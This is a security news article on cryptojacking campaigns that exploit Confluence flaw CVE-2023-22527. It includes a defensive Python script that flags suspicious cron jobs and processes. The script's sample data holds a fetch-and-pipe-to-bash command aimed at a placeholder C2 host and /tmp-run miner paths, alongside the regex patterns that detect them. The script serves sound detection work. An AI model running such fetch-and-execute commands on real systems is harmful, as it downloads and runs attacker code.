Threat actors continue to exploit a critical remote code execution (RCE) Atlassian bug discovered in January, with new attack vectors that turn targeted cloud environments into cryptomining networks.
Trend Micro has uncovered two separate attacks that exploit the flaw, tracked as CVE-2023-22527 in Confluence Data Center and Confluence Server, in cryptojacking attacks that drain network resources. The server is for enterprise-level deployments of Atlassian Confluence, a collaboration and documentation platform designed for teams and organizations to create, share, and collaborate on content.
When discovered, the bug received a 10 out of 10 on the Common Vulnerability Scoring System (CVSS), so researchers knew from the outset that it had great potential for exploitation in attacks ranging from ransomware to cyber espionage. Now, cryptojacking can be added to that list, eight months after the flaw's discovery and subsequent patching by Atlassian, according to a blog post published on Aug. 28 by Trend Micro.
"The attacks involve threat actors that employ techniques such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing cryptomining processes, and maintaining persistence via cron jobs," Abdelrahman Esmail, senior engineer of threat research for Trend Micro, wrote in the post.
Trend Micro also discovered thousands of other attempts to exploit max-critical CVE-2023-22527 over the past few months, and thus recommended that those using the server who have not yet patched their environments should do so as quickly as possible.
New Attack Vectors for CVE-2023-22527
By abusing CVE-2023-22527, an unauthenticated attacker can achieve template injection, essentially enabling RCE on the affected instance.
Trend Micro discovered three threat actors using the bug for cryptojacking attacks. However, only two different attack vectors are described in the post. The first one exploited the flaw in a public-facing Confluence Server application for initial access to the environment. Attackers then executed the XMRig miner via an ELF file payload, hijacking system resources in the process.
The second attack vector is far more sophisticated. It used a shell script to execute miner activity through a shell file over Secure Shell (SSH) for all accessible endpoints in the customer environment, according to Trend Micro. The attackers downloaded the shell file and ran it with bash from memory, then killed all known cryptomining processes and any process being run from /tmp/ directories. They then deleted all cron jobs, adding a new one that runs every five minutes to check for command-and-control (C2) server communications.
To avoid detection, the attackers also uninstalled security services such as Alibaba Cloud Shield, while blocking the Alibaba Cloud Shield IP address. Before the cryptojacking began later in the attack process, the attacker also turned off other security tools present on the system.
Meanwhile, the adversaries identified the current machine's IP address and gathered data on all potential users, IP addresses, and keys, using the information to target other remote systems via SSH to execute further cryptomining activities, Esmail explained in the post. Once that was done, the attacker launched automated attacks on the targeted hosts via SSH, and then maintained access to the server through other cron jobs.
"After ensuring that all cloud monitoring and security services are terminated or deleted, the attacker terminates the entry point process that exploits CVE-2023-22527 and downloads the XMRig miner to begin mining activities," Esmail wrote. Once cryptomining began, the attacker then removed all traces of their activity by clearing logs and bash history.
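As an added defensive example that is not part of Trend Micro's report or this article, the following Python checks a crontab and a process listing for two of the behaviours described above: a cron job on a short every-N-minutes schedule that fetches and runs a script or runs from /tmp, and processes executing from /tmp or via a fetch-and-pipe-to-shell command line. The crontab, process list and the C2 hostname placeholder are constructed for illustration.

```python
import re

# Constructed sample data (not from the Trend Micro report), shaped like the
# persistence described in the article: a five-minute cron job that fetches and
# runs a script, a cron job and a process running out of /tmp.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://EXAMPLE-C2-PLACEHOLDER/x.sh | bash
*/5 * * * * /tmp/.x/update.sh
"""

SAMPLE_PS = """\
  PID COMMAND
  812 /usr/sbin/sshd -D
 2211 /opt/atlassian/confluence/jre/bin/java -Xms1024m
 4090 /tmp/.x/kthreadd
 4102 bash -c curl -fsSL http://EXAMPLE-C2-PLACEHOLDER/x.sh | bash
"""

# curl/wget output piped straight into a shell ("run from memory")
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# an executable or argument living under /tmp or /var/tmp
TMP_PATH = re.compile(r"(^|\s)/(var/)?tmp/\S*")


def suspicious_cron_entries(crontab: str) -> list[str]:
    """Return crontab lines with a short-interval minute field ('*' or '*/N')
    whose command fetches-and-executes or references /tmp."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # m h dom mon dow command
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        short_interval = minute == "*" or minute.startswith("*/")
        if short_interval and (FETCH_AND_RUN.search(command) or TMP_PATH.search(command)):
            hits.append(line)
    return hits


def suspicious_processes(ps_output: str) -> list[int]:
    """Return PIDs whose command line runs from /tmp or pipes a download to a shell."""
    pids = []
    for line in ps_output.splitlines()[1:]:  # skip the 'PID COMMAND' header
        pid, _, command = line.strip().partition(" ")
        if pid.isdigit() and (TMP_PATH.search(" " + command) or FETCH_AND_RUN.search(command)):
            pids.append(int(pid))
    return pids
```

Run the two checks against `crontab -l` output for each user and `ps -eo pid,args`; a hit is a triage lead, not proof of compromise, since legitimate jobs can also live in /tmp.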
Further Mitigations Against Atlassian Confluence Attacks
Staying on top of bug patching for software, operating systems, and applications is the simplest way to prevent such vulnerabilities from being exploited, but Trend Micro also made other recommendations for administrators of cloud environments. These include practicing network segmentation, which can reduce the impact of exploit-based attacks, and conducting regular security audits and vulnerability assessments to help uncover and address weaknesses in infrastructure before exploitation occurs. Beyond that, organizations should have a robust incident response plan in place to ensure a swift and effective response in case of compromise.